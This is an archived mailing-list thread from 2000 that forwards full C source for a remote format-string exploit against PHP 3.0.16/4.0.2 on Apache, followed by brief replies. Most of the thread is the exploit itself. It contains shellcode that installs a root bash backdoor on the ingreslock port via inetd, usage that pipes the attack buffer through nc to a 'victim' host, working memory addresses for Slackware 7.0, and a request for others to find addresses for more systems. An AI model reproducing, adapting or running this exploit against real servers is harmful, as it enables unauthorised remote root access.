Sorry, I do not, you could compile and try the exploit to make that
determination I guess.
Thanks,
Ron DuFresne
On Tue, 5 Dec 2000, Michael wrote:
> Any idea if it works w/ the new version of PHP? 4.0.3 or something like
> that?
>
> *^*^*^*
> Have the courage to take your own thoughts seriously, for they will shape
> you. -- Albert Einstein
>
> On Tue, 5 Dec 2000, R. DuFresne wrote:
>
> >
> > ---------- Forwarded message ----------
> > From: Bryan Paxton <[EMAIL PROTECTED]>
> > Subject: LSLID:2000120402 - Slack-7.0/Apache-1.3.12/PHP-3.0.16 remote
> > exploit
> > Resent-Subject: LSLID:2000120402 - Slack-7.0/Apache-1.3.12/PHP-3.0.16 remote
> > exploit
> > Date: Mon, 4 Dec 2000 12:46:25 -0600
> > Resent-Date: Mon, 4 Dec 2000 13:11:21 -0600 (CST)
> > Resent-From: Ron DuFresne <[EMAIL PROTECTED]>
> > To: [EMAIL PROTECTED]
> > Resent-To: dufresne <[EMAIL PROTECTED]>
> >
> > LSLID:2000120402
> >
> > [mod note]: Exploit code below
> >
> > ==================
> >
> > /*
> > * PHP 3.0.16/4.0.2 remote format overflow exploit.
> > * Copyright (c) 2000
> > * Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau
> > * [EMAIL PROTECTED]
> > * my regards to sheib and darkx
> > * All rights reserved
> > * Pascal Boucheraine's paper was enlightening
> > * THERE IS NO IMPLIED OR EXPRESS WARRANTY FOR THIS CODE.
> > * YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS AND I CANNOT BE HELD RESPONSIBLE
> > * FOR THE CONSEQUENCES
> > * Usage:
> > * phpxpl -sx -uwww.victim.com/some.php3 | nc www.victim.com 80
> > */
> >
> >
> > /*
> > * We just printf the shellcode and stuff and nc it to the target
> > */
> > #include <sys/types.h>
> > #include <unistd.h>
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> >
> > // this exploit does not like 0x0a = '\n' in the shellcode. also the NULL at
> > // the end of the shellcode will be removed as the shellcode is probably
> > // strcatted into the buffer. so do it again in the shellcode.
> > /*
> > * This shellcode is for Linux/x86.
> > * This shellcode spawns a shell and runs the command
> > * echo 'ingreslock stream tcp nowait root /bin/bash bash -i'>/tmp/.inetd.conf;
>/usr/sbin/inetd /tmp/.inetd.conf
> > */
> > char shellcode[] = {
> > 0xeb,0x41,
> > 0x5e,
> > 0x31,0xc0,
> > 0x31,0xdb,
> > 0xb0,0xa0,
> > 0x89,0x34,0x06,
> > 0x8d,0x4e,0x07,
> > 0x88,0x19,
> > 0x41,
> > 0x41,
> > 0xb0,0xa4,
> > 0x89,0x0c,0x06,
> > 0x8d,0x4e,0x0b,
> > 0x88,0x19,
> > 0x41,
> > 0xb0,0xa8,
> > 0x89,0x0c,0x06,
> > 0x8d,0x4e,0x7f,
> > 0x88,0x19,
> > 0x31,0xd2,
> > 0xb0,0xac,
> > 0x89,0x14,0x06,
> > 0x89,0xf3,
> > 0x89,0xf1,
> > 0xb0,0xa0,
> > 0x01,0xc1,
> > 0xb0,0x0b,
> > 0xcd,0x80,
> > 0x31,0xc0,
> > 0xb0,0x01,
> > 0x31,0xdb,
> > 0xcd,0x80,
> > 0xe8,0xba,0xff,0xff,0xff,
> > 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0xff,0xff, /* the string "/bin/sh" */
> > 0x2d,0x63,0xff, /* the string "-c" */
> > 0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20,0x27,0x69,
> > 0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20,0x73,0x74,
> > 0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e,0x6f,0x77,
> > 0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f,0x62,0x69,
> > 0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73,0x68,0x20,
> > 0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,
> > 0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b,0x20,0x2f,
> > 0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69,0x6e,0x65,
> > 0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,0x6e,0x65,
> > 0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
> > };
> >
> > #define NOP 0x90
> >
> >
> > /*
> > * the PHP3 error buffer will already contain PHP 3 Warning: The Content-Type
> > * string was "multipart/form-data. This is 66 bytes long. we send 2 spaces
> > * for padding the addresses we embed in our attack buffer on word boundary
> > */
> > #define PHP3_WARNING 68
> > #define BUF_LEN 1024
> >
> > struct system_type {
> > char *name;
> > unsigned int nop;
> > char *shellcode;
> > int shellcode_len;
> > int offset; /* the number of pops we need to get to
>our own data*/
> > int already_written; /* number of bytes written by printf by
>the time we reach the our embedded data */
> > unsigned int eip_address; /* address where shellcode_address must be
>put */
> > unsigned int shellcode_address; /* address of shellcode in memory */
> > };
> >
> > struct system_type systems[] = {
> > {
> > "Slackware Linux 7.0 - i386/Apache 1.3.12/PHP 3.0.16
>(static module)",
> > 0x90,
> > shellcode,
> > 270, /* not exact but we got lots of space ;) */
> > 27,
> > 0x152,
> > 0xbfff9c30,
> > 0xbfff962c,
> > },
> > // somebody find these and fill it in please. should be
> > // straightforward.
> > {
> > "Red Hat 6.0 - i386/Apache 1.3.13/PHP 3.0.16 (static
>module)",
> > (unsigned int)NULL,
> > NULL,
> > (int)NULL,
> > (int)NULL,
> > (int)NULL,
> > (unsigned int)NULL,
> > (unsigned int)NULL,
> > },
> > {
> > NULL,
> > (unsigned int)NULL,
> > NULL,
> > (int)NULL,
> > (int)NULL,
> > (int)NULL,
> > (unsigned int)NULL,
> > (unsigned int)NULL,
> > },
> > };
> >
> > void usage (void);
> > void parse_url (char *, char *);
> > void prepare_attack_buffer (char *, struct system_type *, char *);
> > int calculate_precision (unsigned int, int);
> >
> > int
> > main (int argc, char *argv[])
> > {
> > char attack_buffer[2000]; // we construct the shellcode and stuff
>here
> > //
>the target is 1024 bytes long
> > struct system_type *sysptr;
> > char *url; // i hope these things dont get
>bigger than this
> > char target[2048]; // target will contain only the
>FQDN
> > unsigned int eip_address = 0, shellcode_address = 0;
> > int ctr = 0;
> > int nop_count;
> > char *walk;
> > int arg;
> >
> > // at least expect a system type and url from the command line
> > if (argc < 3)
> > usage ();
> >
> > // parse arguments
> > while ((arg = getopt (argc, argv, "s:u:e:h:")) != -1){
> > switch (arg){
> > case 'h':
> > sscanf (optarg, "%x",
>&shellcode_address);
> > break;
> > case 'e':
> > sscanf (optarg, "%x",
>&eip_address);
> > break;
> > case 's':
> > sysptr = &systems[atoi (optarg)];
> > break;
> > case 'u':
> > url = optarg;
> > parse_url (url, target);
> > break;
> > case '?':
> > default :
> > usage ();
> > }
> > }
> >
> > if (eip_address)
> > sysptr->eip_address = eip_address;
> > if (shellcode_address)
> > sysptr->shellcode_address = shellcode_address;
> > prepare_attack_buffer (attack_buffer, sysptr, url);
> >
> > // as of now write it out to stdout. later write it to a socket
> > write (STDOUT_FILENO, attack_buffer, sizeof (attack_buffer));
> > }
> >
> > void
> > prepare_attack_buffer (char *attack_buffer, struct system_type *system,
> > char *url)
> > {
> > int dest_buffer_written; /* we keep track of how much bytes
>will be written in the destination buffer */
> > int ctr;
> > char *address;
> > char buf[25]; // temp
>buffer for %xd%n%xd%n%xd%n%xd%n
> >
> // where x is precision
> > int p1,p2,p3,p4;
> > int nop_count;
> >
> > bzero (attack_buffer, 2000);
> > sprintf (attack_buffer, "POST http://%s HTTP/1.0\nConnection:
>close\nUser-Agent: tirpitz\nContent-Type: multipart/form-data ", url);
> > // mark strlen here. whatever we write after here appears in the buffer
> > dest_buffer_written = strlen (attack_buffer);
> >
> > strcat (attack_buffer, "\x11\x11\x11\x11");
> > address = (char *)&system->eip_address;
> > strncat (attack_buffer, address, 4);
> > strcat (attack_buffer, "\x11\x11\x11\x11");
> > system->eip_address++;
> > address = (char *)&system->eip_address;
> > strncat (attack_buffer, address, 4);
> > strcat (attack_buffer, "\x11\x11\x11\x11");
> > system->eip_address++;
> > address = (char *)&system->eip_address;
> > strncat (attack_buffer, address, 4);
> > strcat (attack_buffer, "\x11\x11\x11\x11");
> > system->eip_address++;
> > address = (char *)&system->eip_address;
> > strncat (attack_buffer, address, 4);
> >
> > /*
> > * we need to add %x corresponding to the number of pops we need to reach
> > * our embedded addresses we defined above
> > */
> > for (; system->offset; system->offset--)
> > strcat (attack_buffer, "%x ");
> >
> > p1 = calculate_precision ((system->shellcode_address & 0x000000ff),
>system->already_written);
> > p2 = calculate_precision ((system->shellcode_address & 0x0000ff00) >> 8,
>system->already_written);
> > p3 = calculate_precision ((system->shellcode_address & 0x00ff0000) >> 16,
>system->already_written);
> > p4 = calculate_precision ((system->shellcode_address & 0xff000000) >> 24,
>system->already_written);
> > sprintf (buf, "%%%dd%%n%%%dd%%n%%%dd%%n%%%dd%%n", p1, p2, p3, p4);
> > strcat (attack_buffer, buf);
> >
> > ctr = strlen (attack_buffer);
> > dest_buffer_written = ctr - dest_buffer_written;
> > dest_buffer_written += PHP3_WARNING; // dest_buffer_written now contains
>the number of bytes the PHP_WARNING and then the 8 4 byte values and then the %x to
>pop off the stack
> > attack_buffer += ctr;
> > nop_count = BUF_LEN - dest_buffer_written - system->shellcode_len;
> > memset (attack_buffer, NOP, nop_count);
> > /*
> > * Add our shellcode at last
> > */
> > attack_buffer += nop_count;
> > strcat (attack_buffer, shellcode);
> > strcat (attack_buffer, "\n");
> > strcat (attack_buffer, "Content-Length: 1337\n\n");
> > }
> >
> > void
> > usage (void)
> > {
> > int ctr;
> >
> > fprintf (stderr, " Apache/PHP xploit\n");
> > fprintf (stderr, " Field Marshal Count August Anton Wilhelm
>Neithardt von Gneisenau\n");
> > fprintf (stderr, " for the r00tcrew\n");
> > fprintf (stderr, " All rights reserved\n");
> > fprintf (stderr, "\nUsage:\n");
> > fprintf (stderr, "phpxpl -u url -s systype [ -e eip address ] [ -h
>shellcode address ]\n\n");
> > fprintf (stderr, "url: the complete url including FQDN and script on the
>server\n");
> > fprintf (stderr, " www.victim.com/info.php3\n");
> > fprintf (stderr, "available systypes:\n");
> >
> > for (ctr = 0; systems[ctr].name; ctr++)
> > fprintf (stderr, "%d. %s\n", ctr, systems[ctr].name);
> > fprintf (stderr, "eip address: the address which the xploit overwrites
>with buffer address (specify thus 0xbfff9c30) \n");
> > fprintf (stderr, "shellcode address: the address which points to the NOPs
>(specify thus 0xbfff962c)\n");
> > fprintf (stderr, "\n");
> > exit (1);
> > }
> >
> > void
> > parse_url (char *url, char *target)
> > {
> > char *ptr;
> >
> > strcpy (target, url);
> > if (!(ptr = index (target, '/'))){
> > fprintf (stderr, "invalid url. specify the script name on the
>target server too\n");
> > exit (1);
> > }
> > *ptr = '\0';
> > }
> >
> > /*
> > * addr_byte contains the byte we need to write out. for example: 2c in
> > * 0xbfff962c, then 96, ff and bf.
> > */
> > int
> > calculate_precision (unsigned int addr_byte, int already_written_init)
> > {
> > static int already_written = 0;
> > int tmp;
> >
> > if (!already_written)
> > already_written = already_written_init;
> >
> > while (addr_byte < already_written)
> > addr_byte += 0x100;
> >
> > tmp = addr_byte - already_written;
> > already_written = addr_byte;
> > return tmp;
> > }
> >
> > ===============
> >
> >
> > attached is a simple exploit. works perfectly on my slack-7.0. somebody
> > please find the correct addresses for other distros/releases.
> >
> > if the default ones dont work specify these from the commandline for slack
> > 7.0
> > eip address/shellcode address
> > 0xbfff9b90/0xbfff958c
> >
> >
> > ______________________________________________
> > FREE Personalized Email at Mail.com
> > Sign up at http://www.mail.com/?sr=signup
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl) www.modssl.org
> > User Support Mailing List [EMAIL PROTECTED]
> > Automated List Manager [EMAIL PROTECTED]
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org
> User Support Mailing List [EMAIL PROTECTED]
> Automated List Manager [EMAIL PROTECTED]
>
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
admin & senior consultant: darkstar.sysinfo.com
http://darkstar.sysinfo.com
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
-- Johnny Hart
testing, only testing, and damn good at it too!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl) www.modssl.org
User Support Mailing List [EMAIL PROTECTED]
Automated List Manager [EMAIL PROTECTED]
